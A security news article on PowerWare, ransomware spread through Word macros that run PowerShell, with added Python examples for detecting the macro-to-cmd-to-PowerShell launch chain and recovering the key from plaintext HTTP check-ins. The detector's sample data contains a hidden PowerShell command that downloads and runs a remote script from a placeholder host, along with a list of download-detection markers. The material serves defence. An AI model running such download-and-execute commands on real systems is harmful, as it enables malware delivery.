PowerWare Ransomware Abuses PowerShell, Office Macros

A new fileless ransomware family has been discovered that abuses Windows’ PowerShell for nefarious activities, a novel approach to ransomware, Carbon Black researchers warn.

Dubbed PowerWare, this piece of malware is delivered via a more traditional method, namely macro-enabled Microsoft Word documents, but it does not write malicious files to disk, as most ransomware does. Instead, it invokes PowerShell, a core utility of current Windows systems, to perform its malicious operations, attempting to blend in with legitimate computer activity.

Ransomware has evolved over the past several months to become one of the biggest threats to both consumers and enterprises, courtesy of families such as CryptoWall, Locky, and Teslacrypt. Ransomware is often delivered via malicious emails and via Exploit Kits, and cybercriminals appear determined to employ new techniques to make their malware more efficient.

Most recently, ransomware started attacking hospitals, and PowerWare first emerged in a campaign targeting a healthcare organization, Carbon Black researchers reveal. The ransomware is delivered via malicious Word documents that use embedded macros to spawn “cmd.exe” on the target computer, which in turn calls PowerShell to download and run the PowerWare code.

Researchers noticed that, as soon as the user enables macros in the malicious document, cmd.exe spawns and launches two instances of PowerShell: one to download the ransomware script, and a second that runs with that script as its input. The script generates random numbers for the encryption key and for the UUID assigned to the endpoint.
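The launch chain described above (an Office application spawning cmd.exe, which spawns two PowerShell instances, one downloading and one executing) is a good candidate for endpoint detection. The following is an added example, not Carbon Black's tooling or anything from the PowerWare script: it walks constructed process-creation records, reconstructs each PowerShell process's ancestry, and flags those whose parents include cmd.exe under an Office binary. The record fields, the sample command lines, the `placeholder.invalid` host and the download-marker list are assumptions, not real telemetry or the real PowerWare command line.

```python
"""Flag PowerShell processes launched through Office -> cmd.exe.

Added example; the event schema and sample events are constructed and do
not reproduce PowerWare's actual command lines.
"""
from dataclasses import dataclass
from typing import Dict, List, NamedTuple, Optional

# Office images whose children should rarely be command interpreters.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Substrings (lower-cased) that indicate the PowerShell command line fetches remote content.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient", "bitstransfer")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


class Finding(NamedTuple):
    pid: int
    stage: str          # "download" or "execute"
    chain: List[str]    # image names, child first


# Constructed sample telemetry: a benign Word session, a macro-launched chain,
# and an interactive PowerShell that is not a descendant of Office.
SAMPLE_EVENTS = [
    ProcEvent(400, 100, "explorer.exe", "explorer.exe"),
    ProcEvent(500, 400, "winword.exe", '"WINWORD.EXE" invoice.docm'),
    ProcEvent(600, 500, "cmd.exe", "cmd.exe /c powershell -w hidden ..."),
    ProcEvent(610, 600, "powershell.exe",
              "powershell -w hidden (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage.ps1')"),
    ProcEvent(620, 600, "powershell.exe", "powershell -ExecutionPolicy Bypass -File stage.ps1"),
    ProcEvent(700, 400, "winword.exe", '"WINWORD.EXE" notes.docx'),
    ProcEvent(710, 400, "powershell.exe", "powershell Get-Date"),
]


def index_by_pid(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    return {e.pid: e for e in events}


def ancestry(event: ProcEvent, by_pid: Dict[int, ProcEvent], max_depth: int = 8) -> List[ProcEvent]:
    """Return the event followed by its parents, walking ppid links (bounded to avoid loops)."""
    chain = [event]
    cur = event
    while cur.ppid in by_pid and len(chain) < max_depth:
        cur = by_pid[cur.ppid]
        chain.append(cur)
    return chain


def classify(event: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Optional[Finding]:
    """Flag a powershell.exe whose ancestry contains cmd.exe beneath an Office application."""
    if event.image.lower() != "powershell.exe":
        return None
    chain = [e.image.lower() for e in ancestry(event, by_pid)]
    parents = chain[1:]
    if "cmd.exe" not in parents or not OFFICE_IMAGES.intersection(parents):
        return None
    lowered = event.cmdline.lower()
    stage = "download" if any(m in lowered for m in DOWNLOAD_MARKERS) else "execute"
    return Finding(event.pid, stage, chain)


def find_macro_chains(events: List[ProcEvent]) -> List[Finding]:
    by_pid = index_by_pid(events)
    return [f for f in (classify(e, by_pid) for e in events) if f is not None]


if __name__ == "__main__":
    for f in find_macro_chains(SAMPLE_EVENTS):
        print(f"pid={f.pid} stage={f.stage} chain={' <- '.join(f.chain)}")
```

Two PowerShell children under one cmd.exe beneath Office is the specific pattern the researchers describe; keying the rule on the ancestry rather than on the download cmdlet alone means the second, script-executing instance is still caught when the first one is obfuscated.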

The script also sends this information to the attacker-controlled host via HTTP, and does so in plain text, an approach that creates an operational weakness. Users who have a full packet capture solution can analyze the traffic to identify the relevant domain and IP information and retrieve the encryption key.
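To make that weakness concrete, here is an added example (not the article's or Carbon Black's code, and not PowerWare's real check-in format, which the article does not give) that parses a captured plaintext HTTP request and pulls the per-victim identifiers back out of it. The two captured requests are constructed, the `placeholder.invalid` host is a placeholder, and the parameter names `uuid` and `key` are assumptions.

```python
"""Extract victim UUID and encryption key from a captured plaintext HTTP check-in.

Added example with constructed captures; parameter names are assumed.
"""
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed capture 1: identifiers posted as a URL-encoded form body.
_BODY = b"uuid=1234567890&key=87654321987654321"
CAPTURED_POST = (
    b"POST /checkin.php HTTP/1.1\r\n"
    b"Host: placeholder.invalid\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    + f"Content-Length: {len(_BODY)}\r\n\r\n".encode("ascii")
    + _BODY
)

# Constructed capture 2: the same identifiers carried in a GET query string.
CAPTURED_GET = (
    b"GET /checkin.php?uuid=1234567890&key=87654321987654321 HTTP/1.1\r\n"
    b"Host: placeholder.invalid\r\n"
    b"\r\n"
)


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Trust Content-Length when present so trailing capture bytes are not mistaken for body.
    length = int(headers.get("content-length", len(body)))
    return method, target, headers, body[:length]


def extract_fields(raw: bytes) -> Dict[str, str]:
    """Collect request parameters from the query string and, for form posts, the body."""
    method, target, headers, body = parse_http_request(raw)
    parts = urlsplit(target)
    fields: Dict[str, str] = {"method": method, "host": headers.get("host", ""), "path": parts.path}
    fields.update({k: v[0] for k, v in parse_qs(parts.query).items()})
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        fields.update({k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()})
    return fields


def recover_key(raw: bytes, key_names=("key", "k", "pass", "password")) -> Optional[str]:
    """Return the first field that looks like the key, or None if the capture has none."""
    fields = extract_fields(raw)
    for name in key_names:
        if name in fields:
            return fields[name]
    return None


if __name__ == "__main__":
    for cap in (CAPTURED_POST, CAPTURED_GET):
        f = extract_fields(cap)
        print(f"{f['method']} {f['host']}{f['path']} uuid={f.get('uuid')} key={recover_key(cap)}")
```

In practice the raw request would come from a packet-capture tool's stream reassembly; the point of the example is that, because nothing is encrypted in transit, the same key that locks the files is recoverable by anyone who retained the traffic, which is why full packet capture at the egress point is worth the storage cost.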

After communicating with the command and control server, the script encrypts files that have specific extensions (it can encrypt a broad range of file formats, the researchers found). The ransomware also drops an HTML file in every folder containing encrypted files, telling users how they can regain access to their files and demanding a $500 ransom (which doubles after two weeks).

While PowerWare’s behavior differs from that of the popular ransomware families out there, using PowerShell to perform file encryption on compromised systems is not new: it was observed in 2014 by Sophos researchers analyzing a piece of Russian ransomware. Cybercriminals have been abusing PowerShell in other malware as well, the most recent example being PowerSniff.